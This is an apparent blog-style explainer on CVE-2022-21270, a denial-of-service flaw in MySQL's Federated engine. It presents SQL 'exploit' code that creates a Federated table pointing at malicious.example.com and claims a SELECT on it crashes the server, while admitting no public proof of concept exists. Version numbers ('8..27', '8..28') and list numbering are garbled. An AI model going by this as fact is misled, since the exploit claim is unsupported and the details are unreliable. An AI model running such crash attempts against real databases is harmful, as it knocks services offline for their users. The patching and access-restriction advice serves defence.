In this article, we’ll dig deep into CVE-2022-21270, a serious Denial-of-Service (DoS) vulnerability in Oracle MySQL Server, specifically within the Federated storage engine component. This issue lets authenticated users with high-level privileges crash the server, potentially taking your databases offline. Using simple language, this exclusive deep dive will help you understand the bug, see example exploit code, and learn how to protect your systems.

What is CVE-2022-21270?

CVE-2022-21270 is a security vulnerability in Oracle MySQL Server’s Federated component. If you’re running any version up to 5.7.36 or 8..27, you’re at risk. Attackers who already have high-level credentials (*like DBAs*), and can connect over the network, could repeatedly crash MySQL, causing a full denial of service.

*CVSS 3.1 Base Score*: 4.9
*Impact*: Availability (Denial-of-Service)
Full CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

Federated Storage Engine 101

MySQL’s Federated engine lets you create tables that point to tables in another MySQL server. This is great for distributed databases, but comes with extra risks: the federated engine has to handle network links to external databases, and attackers can exploit weaknesses to crash the whole MySQL instance.

Who is Affected?

Oracle detailed this in their January 2022 Critical Patch Update Advisory:

MySQL Server versions 8..27 and earlier

If you use the Federated storage engine, or you allow users to create federated tables, you need to pay attention to this vulnerability.

How Does the Exploit Work?

According to sources (NVD entry), an authenticated high-privileged user can trigger the vulnerability over the network using crafted SQL statements that interact with Federated tables. The flaw is in how the Federated engine processes remote table definitions or connections. Sending specially-crafted input can panic the server, causing a repeatable crash — a classic DoS.

Attacker gains high-privilege MySQL account (like root or DBA)

2. Attacker creates a Federated table pointing to a remote destination with malformed connection info, or points to a non-MySQL service.
3. Any query or operation on the Federated table (SELECT, INSERT, etc.) triggers server code that can’t handle the malformed response correctly, leading to a crash.

Here’s an example (for a vulnerable MySQL server) that could trigger a crash

-- Connect as a privileged user
CREATE SERVER malicious_server
FOREIGN DATA WRAPPER mysql
OPTIONS (
    HOST 'malicious.example.com', -- could be localhost or attacker-controlled
    DATABASE 'fake_db',
    USER 'fake_user',
    PASSWORD 'fake_pass'
);

-- Create a Federated table referencing the malicious server
CREATE TABLE crash_me (
    id INT(11) NOT NULL AUTO_INCREMENT PRIMARY KEY,
    data VARCHAR(100)
) ENGINE=FEDERATED
CONNECTION='mysql://fake_user:fake_pass@malicious.example.com:3306/fake_db/crash_table';

-- Accessing the table now (even something like below) can crash the server:
SELECT * FROM crash_me;

The key here is that the remote server either doesn’t exist, is a non-MySQL service, or responds in a way that trips up the Federated engine. In older versions, this can panic the MySQL server process and cause a full crash.

Proof-of-Concept Details

The full proof-of-concept (PoC) has not been made available publicly by Oracle or security researchers, but the information above is based on references noted in the CVE and vendor advisories. If you want to test for exposure safely, never run code like the example above on production databases! Test only in isolated, non-production environments.

Upgrade your MySQL Server to 5.7.37, 8..28, or higher.

MySQL Downloads Page

`

3. Restrict privilege escalation: Limit who has SUPER or other high privileges that let them create servers or federated tables.
4. Restrict network access to your MySQL server — for example, with firewalls and network segmentation.

Check your logs for unusual server crashes that might be exploitation attempts.

## Learn More / References

- Oracle Security Alert (CPUJan2022)
- NVD Entry for CVE-2022-21270
- MySQL Documentation: Federated Storage Engine

Final Thoughts

CVE-2022-21270 is a classic example of how a misused feature — in this case, the Federated engine — can become a weapon in the wrong hands. Even though attackers need high-level database privileges, if they compromise an admin account, they can easily take down your service.

Patch ASAP. If you don’t need Federated, turn it off. If you notice strange crashes, review your logs for abnormal federated table usage.

Timeline

Published on: 01/19/2022 12:15:00 UTC
Last modified on: 04/19/2022 04:08:00 UTC